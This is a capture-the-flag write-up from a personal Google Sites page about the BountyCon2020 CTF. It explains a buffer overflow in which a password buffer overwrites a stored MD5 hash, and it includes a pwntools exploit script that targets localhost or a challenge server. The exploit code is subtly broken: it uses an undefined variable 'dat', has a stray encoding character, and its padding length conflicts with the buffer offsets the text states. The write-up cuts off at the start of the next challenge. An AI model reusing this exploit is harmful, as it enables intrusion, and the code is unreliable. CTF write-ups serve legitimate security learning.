Embedded Files
The BountyCon2020 CTF is sponsored by Facebook and top 20 people from APAC region will be invited to the invitation-only conference in Singapore.
I solved all the challenges in the CTF and I really enjoyed playing it, and I am invited to the Conference.
1. Secure Login
1. Secure Login
Its an easy binary exploitation challenge, binary asks for the password and the comparison is like md5(password) == "hash". We can't crack the hash, though you can find collisions for md5 with reasonable time. There is a buffer overflow in the password buffer and hash is consecutive to the password buffer, for example password buffer is at rbp-0x58 and hash is at rbp-0x30, as there is an overflow in password buffer we can overflow the hash.
Exploit
from pwn import *
from hashlib import md5
p = remote("localhost",10000)
# p = remote("ec2-3-11-37-224.eu-west-2.compute.amazonaws.com",10000)
payload = 'a'*0x81 + md5(dat).digest()Â
p.sendafter("Password: ",payload)
p.interactive()
I expected few more binary exploitation challenges, but this is the only challenge given
2. Lighthouse
2. Lighthouse
Its
Page updated
Google Sites
Report abuse